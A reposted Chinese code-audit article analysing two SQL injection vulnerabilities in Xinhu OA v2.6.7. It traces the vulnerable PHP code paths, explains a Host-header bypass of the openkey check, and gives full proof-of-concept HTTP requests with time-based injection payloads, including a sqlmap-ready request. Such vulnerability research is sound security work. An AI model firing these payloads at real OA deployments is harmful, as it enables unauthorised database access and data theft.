2025年6月24日00:02:10评论29 views字数 5962阅读19分52秒阅读模式

信呼OA v2.6.7 SQL注入漏洞

系统介绍

信呼，免费开源的办公OA系统，包括APP，pc上客户端，REIM即时通信，服务端等，让每个企业单位都有自己的办公系统。

官网：http://www.rockoa.com

路由分析

抓一个登录请求包分析

其中a是方法 m是目录如果有多层目录则 d是最外层目录 m由文件名|目录组成

漏洞点一（存在 ip限制）

源码分析

在文件中分析代码找到webmain/task/openapi/opendkqAction.php的addkqjs方法调用了insert方法

private function addkqjs($sn)  {      $uarr = array(         'pinpai'=> '1',         'num'=> $sn,         'name'=> $sn,         'comid' => '1',         'optdt' => $this->now      );      $uarr['id'] = m('kqjsn')->insert($uarr);      return $uarr;  }

一步步跟进去查看insert方法确认传入的值被带入到sql语句中执行了sql

public function insert($arr)  {      $nid = 0;      if($this->record($arr, ''))$nid = $this->db->insert_id();      return $nid;  } // include/class/mysql.phppublic function record($arr, $where='')  {      return $this->db->record($this->table, $arr, $where);  }public function record($table,$array,$where='')  {      $addbool   = true;      if(!$this->isempt($where))$addbool=false;      $cont     = '';      if(is_array($array)){         foreach($array as $key=>$val){            $cont.=",`$key`=".$this->toaddval($val)."";         }         $cont  = substr($cont,1);      }else{         $cont  = $array;      }      $table = $this->gettables($table);      if($addbool){         $sql="insert into $table set $cont";      }else{         $where = $this->getwhere($where);         $sql="update $table set $cont where $where";      }      return $this->tranbegin($sql);  }private function tranbegin($sql)  {      //if($this->errorbool)return false;      if($this->conn == null)$this->connect();      $this->iudcount++;      if(!$this->tran){         //$this->starttran();         //$this->tran=true;    }      $rsa   = $this->query($sql);      $this->iudarr[]=$rsa;      if(!$rsa)$this->errorbool = true;      return $rsa;  }

接下来就往上看哪里调用addkqjs方法传值 $sn 在同文件内找到了senddata 调用了这个方法

private function senddata($type)  {      $str = $this->postdata;      if(isempt($str))$this->showreturn('', 'not data', 201);      $arr   = json_decode($str, true);      $oi    = 0;$uarr = array();$finarr = array();      $dtobj     = c('date');$adb   = m('admin');$db = m('kqdkjl');$uobj = m('userinfo');      $updt  = '';      $cheobj = c('check');      $snarr     = array();      if($type==9){         $snarr = $this->db->getarr('[Q]kqjsn','`pinpai`=1','`id`,`name`','num');      }      $datype = array('密码','指纹','刷卡');      if(is_array($arr))foreach($arr as $k=>$rs){         $name = isset($rs['name']) ? $rs['name'] : '';         $dkdt = isset($rs['dkdt']) ? $rs['dkdt'] : '';         $finge= isset($rs['finge']) ? $rs['finge'] : '';         $name = str_replace("'",'', $name);         $uid  = 0;         $snid = 0;         $sntype = 1;         $comid = 0;         $explain = '';         if($type==9){            $sn      = arrvalue($rs, 'sn');            if(!$sn)continue;            $snrs = arrvalue($snarr, $sn);            if(!$snrs){               $snrs = $this->addkqjs($sn);               $snarr[$sn] = $snrs;            }

继续分析代码$sn 由arrvalue方法取自传入的第一参数的一个key为sn的valen值

$sn      = arrvalue($rs, 'sn');  functionarrvalue($arr, $k, $dev='')  {      $val  = $dev;      if(isset($arr[$k]))$val= $arr[$k];      return $val;  }

继续分析代码得知想要执行到这里需要$type 等于9且 $rs 来自于 $arr 的value 然后 $arr 又来自于 json解码后的 $str $str来自于传入的post请求体是可控的

最后查找调用 senddata 被同文件下的 zktimeAction 调用同时也传入了9 满足上面的 $type =9

public function zktimeAction()  {      //9中控      $carr  = $this->senddata(9);      echo $carr['updt'];  }

继续看代码发现这个类的父类中存在一个鉴权但是分析代码可知 Host 是127.0.0.1 或 192.168.x.x 的范围就可以绕过验证。

public function initAction()  {      $this->display= false;      $openkey      = $this->post('openkey');      $this->openkey     = getconfig('openkey');      if($this->keycheck && HOST != '127.0.0.1' && !contain(HOST,'192.168') && $this->openkey != ''){         if($openkey != md5($this->openkey))$this->showreturn('', 'openkey not access', 201);      }      $this->getpostdata();  }

按照路由构造请求url

/index.php?m=opendkq|openapi&d=task&a=zktime

按照sn的取值构造两层json

{"cn":{"sn":"123"}}

host 为127.0.0.1

漏洞利用

poc

POST /index.php?m=opendkq|openapi&d=task&a=zktime HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=p4idg1a6f9b059t7laum6m333o; deviceid=1733809734848Connection: closeContent-Length: 34Content-Type: application/x-www-form-urlencoded{"cn":{"sn":"123' and sleep(3)#"}}

sqlmap

sqlmap 结合burp 修改host

POST /index.php?m=opendkq|openapi&d=task&a=zktime HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=p4idg1a6f9b059t7laum6m333o; deviceid=1733809734848Connection: closeContent-Length: 34Content-Type: application/x-www-form-urlencoded{"cn":{"sn":"123'*"}}

漏洞点二（存在 ip限制）

源码分析

webmain/task/openapi/openbaseAction.php

看getpostarr()方法可以分析出传入的post值需要为json格式

继续分析下面的代码传入的参数basemodenum 赋值给了 $modenum baseoptid参数赋值给了 $adminid 但是经过了过滤无法传入单引号等内容

在21行代码中调用getuserid方法对 $adminid 参数进行了查询并且在22行代码可以得知需要让21行的查询获得数据不然会直接报错终止

根据查看sql语句可以得知查询的内容在admin表中分析可知最简单方法的就是传入一个1 即可

继续分析代码查看querydata方法获得了三个参数做了什么操作看代码发现在方法中将传入的 $modenum 也就是 $num 传入了initflow方法中

继续跟进initflow方法发现又被传入了initdata 方法中

在这里 $num 的值被添加到了sql的一个条件语句中被执行其中无任何限制这样我们就可以开始构造poc 进行利用

漏洞利用

poc

POST /index.php?m=openbase%7Copenapi&d=task&a=querydata HTTP/1.1Host: 127.0.0.1Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 58Cookie: {"baseoptid":"1","basemodenum":"a123456' OR SLEEP(0.01)#"}

来源：https://xz.aliyun.com/news/18185

原文始发于微信公众号（船山信安）：php代码审计篇 - 信呼OA 前台注入

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

php代码审计篇 - 信呼OA 前台注入

信呼OA v2.6.7 SQL注入漏洞

系统介绍

漏洞点一（存在 ip限制）

源码分析

漏洞利用

poc

sqlmap

漏洞点二（存在 ip限制）

源码分析

漏洞利用

poc

java二次反序列化链

【代码审计】有手就行的目录穿越定时任务getshell

hkcms搭建教程及后台模板注入

插件前台任意文件读取漏洞复现与分析 (CVE-2025-2294)

JavaWeb代码审计实战开源系统学习心得

实战某凤网站导致的代码审计

【0day】泛微OA前台登录绕过+后台组合拳RCE

广联达远程代码执行代码审计

java agent 学习

KYXSCMS 灰盒测试

发表评论

在线咨询

微信

信呼OA v2.6.7 SQL注入漏洞

系统介绍

漏洞点一 （存在 ip限制）

源码分析

漏洞利用

poc

sqlmap

漏洞点二 （存在 ip限制）

源码分析

漏洞利用

poc

发表评论

在线咨询

微信

漏洞点一（存在 ip限制）

漏洞点二（存在 ip限制）